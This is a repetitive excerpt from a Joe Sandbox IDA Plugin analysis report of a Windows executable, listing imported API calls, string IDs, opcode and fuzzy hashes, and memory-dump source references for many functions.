                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CopyVariant$ErrorLast
                                                                                                                            • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                                                            • API String ID: 2286883814-4206948668
                                                                                                                            • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                            • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                                                            • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                            • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                            • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                                                                            • _wcscpy.LIBCMT ref: 00475F18
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                            • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                                                                            • API String ID: 3052893215-4176887700
                                                                                                                            • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                            • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                                                                            • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                            • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                                                                            APIs
                                                                                                                            • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                                                            • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                                                            • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                                                                            • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                                                              • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                                                                            • String ID: Version$\TypeLib$interface\
                                                                                                                            • API String ID: 656856066-939221531
                                                                                                                            • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                            • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                                                            • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                            • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                                                            APIs
                                                                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                                                            • __swprintf.LIBCMT ref: 0045E6EE
                                                                                                                            • _printf.LIBCMT ref: 0045E7A9
                                                                                                                            • _printf.LIBCMT ref: 0045E7D2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                            • API String ID: 3590180749-2354261254
                                                                                                                            • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                            • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                                                            • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                            • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                            • String ID: %.15g$0x%p$False$True
                                                                                                                            • API String ID: 3038501623-2263619337
                                                                                                                            • Opcode ID: 490d1d685d88e4ac692614f7c2a0757cb870c57d15913fa8f64f937dd46f6444
                                                                                                                            • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                                                                            • Opcode Fuzzy Hash: 490d1d685d88e4ac692614f7c2a0757cb870c57d15913fa8f64f937dd46f6444
                                                                                                                            • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • _memset.LIBCMT ref: 00458194
                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                            • API String ID: 2255324689-22481851
                                                                                                                            • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                            • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                                                            • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                            • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                                                            • __wcsicoll.LIBCMT ref: 004585D6
                                                                                                                            • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                                                                            • String ID: ($interface$interface\
                                                                                                                            • API String ID: 2231185022-3327702407
                                                                                                                            • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                            • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                                                            • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                            • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                            • String ID: 0.0.0.0
                                                                                                                            • API String ID: 2691793716-3771769585
                                                                                                                            • Opcode ID: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                                                                                                            • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                                                                            • Opcode Fuzzy Hash: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                                                                                                            • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                                                                            • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                                                              • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                                                              • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                                                                            • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                                                                            • __lock.LIBCMT ref: 00416B8A
                                                                                                                            • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                                                                            • __lock.LIBCMT ref: 00416BAB
                                                                                                                            • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                                                                            Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
• String ID: DecodePointer$EncodePointer$KERNEL32.DLL
• API String ID: 1028249917-2843748187
• Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
• Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
• Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
• Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
APIs
• SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
• SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
• CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
• SendMessageW.USER32(?,00000402,?), ref: 0044941C
• SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
Similarity
• API ID: MessageSend$CharNext
• String ID:
• API String ID: 1350042424-0
• Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
• Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
• Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
• Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
APIs
• GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
• SetKeyboardState.USER32(?), ref: 00453C5A
• GetAsyncKeyState.USER32(000000A0), ref: 00453C82
• GetKeyState.USER32(000000A0), ref: 00453C99
• GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
• GetKeyState.USER32(000000A1), ref: 00453CDA
• GetAsyncKeyState.USER32(00000011), ref: 00453D07
• GetKeyState.USER32(00000011), ref: 00453D15
• GetAsyncKeyState.USER32(00000012), ref: 00453D3F
• GetKeyState.USER32(00000012), ref: 00453D4D
• GetAsyncKeyState.USER32(0000005B), ref: 00453D77
• GetKeyState.USER32(0000005B), ref: 00453D85
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
• Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
• Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
• Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
APIs
• GetDlgItem.USER32(?,00000001), ref: 00437DD7
• GetWindowRect.USER32(00000000,?), ref: 00437DE9
• MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
• GetDlgItem.USER32(?,00000002), ref: 00437E70
• GetWindowRect.USER32(00000000,?), ref: 00437E82
• MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
• GetDlgItem.USER32(?,000003E9), ref: 00437EEA
• GetWindowRect.USER32(00000000,?), ref: 00437EFC
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
• GetDlgItem.USER32(?,000003EA), ref: 00437F55
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
• InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
• Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
• Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
• Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
APIs
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
• Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
• Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
• Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
• Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
Similarity
• API ID: ConnectRegistry_wcslen
• String ID: HH
• API String ID: 535477410-2761332787
• Opcode ID: e2a7fb052978a91ecbf92423e9c711e8fd026b8448a895789e5cd97d1a81579d
• Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
• Opcode Fuzzy Hash: e2a7fb052978a91ecbf92423e9c711e8fd026b8448a895789e5cd97d1a81579d
• Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 004604B5
• GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
• _wcslen.LIBCMT ref: 00460502
• CharUpperBuffW.USER32(?,00000000), ref: 00460510
• GetClassNameW.USER32(?,?,00000400), ref: 00460589
• GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
• GetClassNameW.USER32(?,?,00000400), ref: 00460606
• GetClassNameW.USER32(?,?,00000400), ref: 0046063E
• GetWindowRect.USER32(?,?), ref: 004606AD
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
• String ID: ThumbnailClass
• API String ID: 4123061591-1241985126
• Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
• Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
• Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
• Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
APIs
  • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
  • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
• DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
• ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
• ImageList_EndDrag.COMCTL32 ref: 0046F583
• ReleaseCapture.USER32 ref: 0046F589
• SetWindowTextW.USER32(?,00000000), ref: 0046F620
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                                                            • API String ID: 2483343779-2060113733
                                                                                                                            • Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                                                            • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                                                            • Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                                                            • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                                                                            APIs
                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                                                                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                                                                            • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                                                                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                                                                            • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                            • String ID: 2
                                                                                                                            • API String ID: 1331449709-450215437
                                                                                                                            • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                            • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                                                                            • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                            • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
